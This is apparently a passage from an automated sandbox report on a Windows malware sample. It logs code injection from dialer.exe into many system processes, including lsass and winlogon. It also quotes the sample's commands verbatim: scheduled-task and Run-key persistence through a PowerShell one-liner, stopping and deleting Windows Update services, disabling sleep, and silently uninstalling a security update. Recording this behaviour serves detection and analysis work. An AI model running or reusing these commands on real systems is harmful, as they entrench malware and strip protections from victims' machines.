                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64500000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CB55570000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8C0730000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 240D6250000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 227F2E70000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1E71EBB0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23E7F4D0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 268D2E90000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A220F70000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 112C58A0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\Desktop\GR55Qg1hth.exe base: 1B630F60000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B240000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\Desktop\F4R5fd8grr.exe base: 2730000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E9A6600000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21CEA710000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1C25C740000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sc.exe base: 17CD5980000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20FE3BB0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe base: 23E07EF0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2E72A0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1A645CD0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 12762130000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 29BB2510000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25AB6AE0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19216AB0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B3680000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B36E0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 270D5B50000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20717890000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 162620F0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0200000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0230000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 24C84EC0000 value starts with: 4D5A
                    Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 3160000 value: 4D
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeSection loaded: NULL target: unknown protection: readonlyJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeThread register set: target process: 7680Jump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeThread register set: target process: 7760Jump to behavior
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeThread register set: target process: 4480
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeThread register set: target process: 2028
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeThread register set: target process: 4144
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeMemory written: C:\Windows\System32\dialer.exe base: 4319A96010Jump to behavior
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDA0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B950000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166960000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29D00000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3160000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64500000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CB55570000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8C0730000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 240D6250000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 227F2E70000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1E71EBB0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23E7F4D0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 268D2E90000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A220F70000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 112C58A0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\Desktop\GR55Qg1hth.exe base: 1B630F60000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B240000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\Desktop\F4R5fd8grr.exe base: 2730000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E9A6600000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21CEA710000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1C25C740000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sc.exe base: 17CD5980000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20FE3BB0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe base: 23E07EF0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2E72A0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1A645CD0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 12762130000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 29BB2510000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25AB6AE0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19216AB0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B3680000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B36E0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 270D5B50000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20717890000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\schtasks.exe base: 162620F0000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0200000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0230000
                    Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 24C84EC0000
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C9B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF731C9B110
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess created: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess created: C:\Users\user\Desktop\GR55Qg1hth.exe "C:\Users\user\Desktop\GR55Qg1hth.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess created: C:\Users\user\Desktop\F4R5fd8grr.exe "C:\Users\user\Desktop\F4R5fd8grr.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /fJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /fJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'barac' /tr '''c:\program files\cuis\bon\bara.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\cuis\bon\bara.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'barac' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "barac" /t reg_sz /f /d 'c:\program files\cuis\bon\bara.exe' }
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /fJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'barac' /tr '''c:\program files\cuis\bon\bara.exe'''" } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\cuis\bon\bara.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'barac' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "barac" /t reg_sz /f /d 'c:\program files\cuis\bon\bara.exe' }Jump to behavior
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,51_2_0000000140001B54
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,51_2_0000000140001B54
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CB5860 cpuid 0_2_00007FF731CB5860
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF731C9A24C
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeQueries volume information: C:\Users\user\Desktop\F4R5fd8grr.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
